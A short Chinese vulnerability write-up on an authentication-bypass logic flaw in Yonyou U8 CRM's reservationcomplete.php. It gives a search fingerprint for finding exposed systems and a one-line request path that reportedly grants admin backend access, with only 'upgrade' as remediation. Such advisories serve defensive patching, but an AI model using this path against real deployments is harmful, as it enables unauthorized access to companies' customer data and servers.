用友CRM reservationcomplete.php逻辑漏洞登录后台

产品简介

用友CRM(Customer Relationship Management,客户关系管理)是由用友公司开发的一款软件,专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系,提升客户满意度,优化销售和服务流程,从而提高企业的市场竞争力。它适用于各种规模的企业,可以根据不同企业的具体需求进行定制和扩展。

资产测绘

title=="用友U8CRM"

漏洞概述

用友CRM系统在reservationcomplete.php接口处存在逻辑漏洞,攻击者可通过该漏洞直接进去后台,获取后台权限,为后续获取服务器权限做准备。

漏洞复现

访问url:/background/reservationcomplete.php?ID=1

访问后,直接访问主页进入后台

修复建议

升级至最新安全版本

相关推荐
传说中胖子5 分钟前
Magento服务器VSCode开启XDebug方法
服务器·vscode·php
wanhengidc7 分钟前
物理服务器的功能都有哪些
运维·服务器·网络·安全·web安全·智能手机
lly2024068 分钟前
PHP Math
开发语言
星幻元宇VR8 分钟前
VR施工安全行走平台:沉浸式安全教育新方式
科技·学习·安全·生活·vr
IT科技那点事儿9 分钟前
Fortinet 全面升级安全运营平台:全面整合云 SOC、智能体 AI、托管检测与响应及端点安全防护
人工智能·安全
唔6613 分钟前
flutter 图片加载类 图片的安全使用
安全·flutter
zs宝来了23 分钟前
软件供应链安全:SBOM 与签名验证
安全·devsecops·云安全
EasyGBS25 分钟前
国标GB28181视频分析平台EasyGBS视频质量诊断为平安社区视频监控筑牢安全防线
人工智能·安全·音视频
哇哦98226 分钟前
渗透安全(渗透防御)①
安全·防御·渗透防御
李日灐29 分钟前
<1>Linux基础指令:Linux 高频指令详解 + 文件与目录认知
linux·运维·服务器·开发语言·后端·命令